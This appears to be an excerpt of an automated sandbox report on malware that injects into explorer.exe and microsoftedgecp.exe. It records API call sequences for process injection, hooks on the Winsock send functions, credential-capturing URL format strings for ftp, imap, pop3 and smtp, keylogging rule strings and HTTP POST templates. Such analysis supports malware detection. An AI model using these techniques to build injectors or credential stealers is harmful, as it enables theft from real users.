                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
                                                        • Instruction ID: 77588290d4e37ef700697110175aaff6c1c57f9cd16726c1ee75de6bd7924a5a
                                                        • Opcode Fuzzy Hash: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
                                                        • Instruction Fuzzy Hash: 8CA002715502507FFD4557A4FD1DF557A19B7C5B11F0045447189C50609968554C9F21

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,756F3E2E,microsoftedgecp.exe,?), ref: 0008184E
                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00081889
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00081919
                                                        • RtlMoveMemory.NTDLL(00000000,00083428,00000016), ref: 00081940
                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081968
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081978
                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081992
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0008199A
                                                        • CloseHandle.KERNEL32(00000000), ref: 000819A8
                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819AF
                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000819C5
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819CC
                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000819E2
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A0C
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081A1F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081A26
                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A2D
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A41
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081A58
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081A65
                                                        • CloseHandle.KERNEL32(?), ref: 00081A6B
                                                        • CloseHandle.KERNEL32(?), ref: 00081A71
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081A74
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                        • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                        • API String ID: 1066286714-4141090125
                                                        • Opcode ID: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
                                                        • Instruction ID: 9f5633c6449d72ef76d13a6fe6a98af6d308b0c36e19ae64f2dd6a10d85f2928
                                                        • Opcode Fuzzy Hash: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
                                                        • Instruction Fuzzy Hash: 47618E31105304AFE710EF65DC84EABBBECFF89B54F000519F989D6291DA74DA058B62

                                                        Control-flow Graph

                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
                                                        • lstrlen.KERNEL32(?,00000000), ref: 0008267A
                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
                                                        • wsprintfA.USER32 ref: 000826B6
                                                        • CryptDestroyHash.ADVAPI32(?), ref: 000826CF
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                        • String ID: %02X
                                                        • API String ID: 3341110664-436463671
                                                        • Opcode ID: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
                                                        • Instruction ID: 6f7decda94893415d9c613d86727ea4291130fd5527fc19c423d8df5fa7bf1f8
                                                        • Opcode Fuzzy Hash: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
                                                        • Instruction Fuzzy Hash: D51128B1A00108BFEB119B95EC98EAEBFBCFB88B41F104065F645E2160D6758F119B60

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                          • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0008109E,?,00081010), ref: 0008134A
                                                        • GetCurrentProcessId.KERNEL32(00000003,?,0008109E,?,00081010), ref: 0008135B
                                                        • wsprintfA.USER32 ref: 00081372
                                                          • Part of subcall function 0008263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
                                                          • Part of subcall function 0008263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
                                                          • Part of subcall function 0008263E: lstrlen.KERNEL32(?,00000000), ref: 0008267A
                                                          • Part of subcall function 0008263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
                                                          • Part of subcall function 0008263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
                                                          • Part of subcall function 0008263E: wsprintfA.USER32 ref: 000826B6
                                                          • Part of subcall function 0008263E: CryptDestroyHash.ADVAPI32(?), ref: 000826CF
                                                          • Part of subcall function 0008263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9
                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081389
                                                        • GetLastError.KERNEL32 ref: 0008138F
                                                        • Sleep.KERNEL32(000001F4), ref: 000813A1
                                                          • Part of subcall function 000824D5: GetCurrentProcessId.KERNEL32 ref: 000824E7
                                                          • Part of subcall function 000824D5: GetCurrentThreadId.KERNEL32 ref: 000824EF
                                                          • Part of subcall function 000824D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
                                                          • Part of subcall function 000824D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
                                                          • Part of subcall function 000824D5: CloseHandle.KERNEL32(00000000), ref: 00082566
                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 000813B8
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000813BF
                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 000813E4
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000813EB
                                                          • Part of subcall function 00081DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081E1D
                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0008141D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                        • API String ID: 706757162-1430290102
                                                        • Opcode ID: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
                                                        • Instruction ID: e1150cd2257c806cacc2476d6baa2bc67bd95f910a78fb5d1cafcba5e1534409
                                                        • Opcode Fuzzy Hash: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
                                                        • Instruction Fuzzy Hash: 1D317531340615BBDF107FA0DC1ABDE3B59BF95F41F005014FAC69A292CF799A528BA1

                                                        Control-flow Graph

                                                        control_flow_graph 235 81647-8165a 236 81748-8174f 235->236 237 81660-81662 235->237 237->236 238 81668-8166b 237->238 238->236 239 81671-8167d lstrlen 238->239 240 81683-8168a lstrlen 239->240 241 81747 239->241 240->241 242 81690-816a8 getpeername 240->242 241->236 242->241 243 816ae-816ca inet_ntoa htons 242->243 243->241 244 816cc-816d4 243->244 245 81708 244->245 246 816d6-816d9 244->246 249 8170d-8173c call 82861 wsprintfA call 824ae 245->249 247 816db-816de 246->247 248 816f3-816f8 246->248 250 816e0-816e3 247->250 251 81701-81706 247->251 248->249 249->241 259 8173e-81745 call 82843 249->259 254 816fa-816ff 250->254 255 816e5-816ea 250->255 251->249 254->249 255->248 257 816ec-816f1 255->257 257->241 257->248 259->241
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                        • API String ID: 3379139566-1703351401
                                                        • Opcode ID: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
                                                        • Instruction ID: d5608456101c3c778587acf2e152922007bce819ecc53712541b90b68493945c
                                                        • Opcode Fuzzy Hash: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
                                                        • Instruction Fuzzy Hash: 97219236E04209ABAF517EA9CD885FE7AFDBF85701F084179E9C4D3211DA34CE129B64

                                                        Control-flow Graph

                                                        control_flow_graph 267 81752-81774 GetModuleHandleA GetProcAddress 268 817c1-817c6 267->268 269 81776-817c0 RtlZeroMemory * 4 267->269 269->268
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00081539,?,?,?,0008144B,?), ref: 00081763
                                                        • GetProcAddress.KERNEL32(00000000,?,00081539,?,?,?,0008144B,?), ref: 0008176A
                                                        • RtlZeroMemory.NTDLL(00084228,00000104), ref: 00081788
                                                        • RtlZeroMemory.NTDLL(00084118,00000104), ref: 00081790
                                                        • RtlZeroMemory.NTDLL(00084330,00000104), ref: 00081798
                                                        • RtlZeroMemory.NTDLL(00084000,00000104), ref: 000817A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                        • API String ID: 1490332519-278825019
                                                        • Opcode ID: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
                                                        • Instruction ID: 530bc9f54433c06892bab1a68e75f7d045b8179b057df917c1f81b95164fa071
                                                        • Opcode Fuzzy Hash: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
                                                        • Instruction Fuzzy Hash: 29F0823278032D33852032EABC0AD4BBE5CFBD1FA63420161B7C4AB281D8996A004BF4

                                                        Control-flow Graph

                                                        control_flow_graph 271 824d5-82513 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 272 82561-82563 271->272 273 82515-82519 272->273 274 82565-82572 CloseHandle 272->274 275 8251b-8251f 273->275 276 82555-8255b Thread32Next 273->276 275->276 277 82521-8253a OpenThread 275->277 276->272 278 8253c-82542 SuspendThread 277->278 279 82544 ResumeThread 277->279 280 8254a-82551 CloseHandle 278->280 279->280 280->276
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 000824E7
                                                        • GetCurrentThreadId.KERNEL32 ref: 000824EF
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008252C
                                                        • SuspendThread.KERNEL32(00000000), ref: 0008253C
                                                        • CloseHandle.KERNEL32(00000000), ref: 0008254B
                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008255B
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082566
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                        • String ID:
                                                        • API String ID: 1467098526-0
                                                        • Opcode ID: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
                                                        • Instruction ID: fb39f373af59805266f910fafb1a5732cded0f9030e1640caf296d2c8af7054c
                                                        • Opcode Fuzzy Hash: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
                                                        • Instruction Fuzzy Hash: B9118EB1044700EFE710AF60AC2CB6EBBA8FFC5B01F000529FAC192150D7399A498FA7

                                                        Control-flow Graph

                                                        control_flow_graph 281 81f4a-81fa5 call 822b8 call 82861 call 827e2 call 82374 290 81fc0-81fcc 281->290 291 81fa7-81fbe 281->291 294 81fd0-81fd2 290->294 291->294 295 81fd8-8200f RtlZeroMemory 294->295 296 822a6-822b5 call 82843 294->296 300 8229e-822a5 295->300 301 82015-82030 295->301 300->296 302 82062-82074 301->302 303 82032-82043 call 822e5 301->303 308 82078-8207a 302->308 309 82045-82054 303->309 310 82056 303->310 312 8228b-82291 308->312 313 82080-820dc call 82731 308->313 311 82058-82060 309->311 310->311 311->308 314 8229a 312->314 315 82293-82295 call 82843 312->315 321 820e2-820e7 313->321 322 82284 313->322 314->300 315->314 323 820e9-820fa 321->323 324 82101-8212f call 82861 wsprintfW 321->324 322->312 323->324 327 82148-8215f 324->327 328 82131-82133 324->328 334 8219e-821b8 327->334 335 82161-82197 call 82861 wsprintfW 327->335 329 82134-82137 328->329 330 82139-8213e 329->330 331 82142-82144 329->331 330->329 333 82140 330->333 331->327 333->327 339 821be-821d1 334->339 340 82261-82277 call 82843 334->340 335->334 339->340 343 821d7-821ed call 82861 339->343 348 82279-8227b call 82843 340->348 349 82280 340->349 350 821ef-821fa 343->350 348->349 349->322 352 821fc-82209 call 82826 350->352 353 8220e-82225 350->353 352->353 357 82229-82236 353->357 358 82227 353->358 357->350 359 82238-8223c 357->359 358->357 360 8223e 359->360 361 82256-8225d call 82843 359->361 362 8223e call 82815 360->362 361->340 364 82243-82250 RtlMoveMemory 362->364 364->361
                                                        APIs
                                                          • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                          • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                          • Part of subcall function 000827E2: lstrlen.KERNEL32(000840DA,?,00000000,00000000,00081F86,75712B62,000840DA,00000000), ref: 000827EA
                                                          • Part of subcall function 000827E2: MultiByteToWideChar.KERNEL32(00000000,00000000,000840DA,00000001,00000000,00000000), ref: 000827FC
                                                          • Part of subcall function 00082374: RtlZeroMemory.NTDLL(?,00000018), ref: 00082386
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00081FE2
                                                        • wsprintfW.USER32 ref: 0008211B
                                                        • wsprintfW.USER32 ref: 00082186
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00082250
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                        • API String ID: 4204651544-1701262698
                                                        • Opcode ID: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
                                                        • Instruction ID: 255fa56fcf304d2d87e24e71b666508560c75d90a8d3bc13f7fa8d1b7e7ffd1a
                                                        • Opcode Fuzzy Hash: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
                                                        • Instruction Fuzzy Hash: A9A17E71609305AFD750EFA8C885A6BBBE8FF88740F10092DF9C5D7252DA74DE048B52

                                                        Control-flow Graph

                                                        APIs
                                                        • OpenProcess.KERNEL32(00000400,00000000,?,756F3E2E,?,?,microsoftedgecp.exe,00081287), ref: 000825BF
                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 000825D1
                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 000825E4
                                                        • CloseHandle.KERNEL32(00000000), ref: 000825FA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                        • String ID: microsoftedgecp.exe
                                                        • API String ID: 331459951-1475183003
                                                        • Opcode ID: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
                                                        • Instruction ID: 3f0c6239a235d8a9353f50cbffe2d8c9637570955e109b19aea4602d3b8e1d07
                                                        • Opcode Fuzzy Hash: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
                                                        • Instruction Fuzzy Hash: C8F03071942A18FFAB10DF949E988EE77ACFB01655B14026AF954A2140DB354F04EBA0

                                                        Control-flow Graph

                                                        APIs
                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00081B4E
                                                        • LoadLibraryA.KERNEL32(?), ref: 00081B76
                                                        • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081BA3
                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081BF4
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                        • String ID:
                                                        • API String ID: 3827878703-0
                                                        • Opcode ID: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
                                                        • Instruction ID: 31b629b9df2a73af95de90739bfef73f464a0266a5217f3dfc158e275eeba735
                                                        • Opcode Fuzzy Hash: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
                                                        • Instruction Fuzzy Hash: 5A31AC75700612ABCB68DF29C894BA6B7ECBF15315B14456CE8C6CB200E735E846CBA0

                                                        Execution Graph

                                                        Execution Coverage:8.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:2

                                                        Callgraph


                                                        Control-flow Graph

                                                        APIs
                                                        • NtUnmapViewOfSection.NTDLL ref: 000E35D8
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_e1000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                        • Instruction ID: 35eb1cebd07adc1b18c6b69b15e046bd059cdd6563af234ede06875f38d9c43f
                                                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                        • Instruction Fuzzy Hash: 9B119430715E495FEB5CBBB9989D2B93BE0EB54301F54412AA419D76A2DE398A40C701

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_e1000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32lstrcmpi
                                                        • String ID:
                                                        • API String ID: 1122579583-0
                                                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                        • Instruction ID: 3c1d8b55e3ff178904e20a1481308595a5ff600b8310a3f59a15f7a6f8feadba
                                                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                        • Instruction Fuzzy Hash: 3E813131218A488FE75AEF55EC58FEBB7E1FB50740F54461AA442D71A0EF78EA04CB81

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32 ref: 000EA147
                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 000EA1BB
                                                        • VirtualProtect.KERNELBASE ref: 000EA1D9
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.624527841.00000000000E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E7000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_e7000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 895956442-0
                                                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                        • Instruction ID: 1942967e0a7e8a8ee5ce9eacee8d3334c4da41f6bf0ae595b40eab4127ce933e
                                                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                        • Instruction Fuzzy Hash: DF51993135899D0ECB34AA399CC47B9B7C1E75F321F18066AC08AD3285D919F8868383

                                                        Execution Graph

                                                        Execution Coverage:9.5%
                                                        Dynamic/Decrypted Code Coverage:97.5%
                                                        Signature Coverage:17.7%
                                                        Total number of Nodes:322
                                                        Total number of Limit Nodes:4

                                                        Callgraph

                                                        (Callgraph rendering omitted; only its edge list survived extraction. It links 49 functions, Function_00081000 through Function_00089AE0, with Function_00081000 → Function_00081016 at the root, the injection path Function_000818BF → Function_00081B26 / Function_00081BBD, and the logging path Function_00081581 → Function_000816B9.)

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106C
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081075
                                                        • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107B
                                                        • wsprintfA.USER32 ref: 000810E7
                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                                        • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                                        • CharLowerA.USER32(?), ref: 00081199
                                                        • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                                        • CloseHandle.KERNEL32(00000000), ref: 0008127F
                                                        • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                        • API String ID: 3206029838-2805246637
                                                        • Opcode ID: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                                        • Instruction ID: c891c7935db4289d37885e744c3d10944dcfcb3c9ed39a47a4427c91ed757d4e
                                                        • Opcode Fuzzy Hash: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                                        • Instruction Fuzzy Hash: 2251C5302047019BD714BF74DC599BA77EDFF84B41F040528F9D6972A2EA389A468F62

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • wsprintfA.USER32 ref: 000810E7
                                                          • Part of subcall function 0008276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                                          • Part of subcall function 0008276D: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                                        • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                                        • CharLowerA.USER32(?), ref: 00081199
                                                        • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                                        • CloseHandle.KERNEL32(00000000), ref: 0008127F
                                                        • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                        • API String ID: 3018447944-2805246637
                                                        • Opcode ID: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                                        • Instruction ID: a52374c8d3c32c87d7b7eec75c6ac1f607deb3f7449bc71aaab08c49aa80d9b3
                                                        • Opcode Fuzzy Hash: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
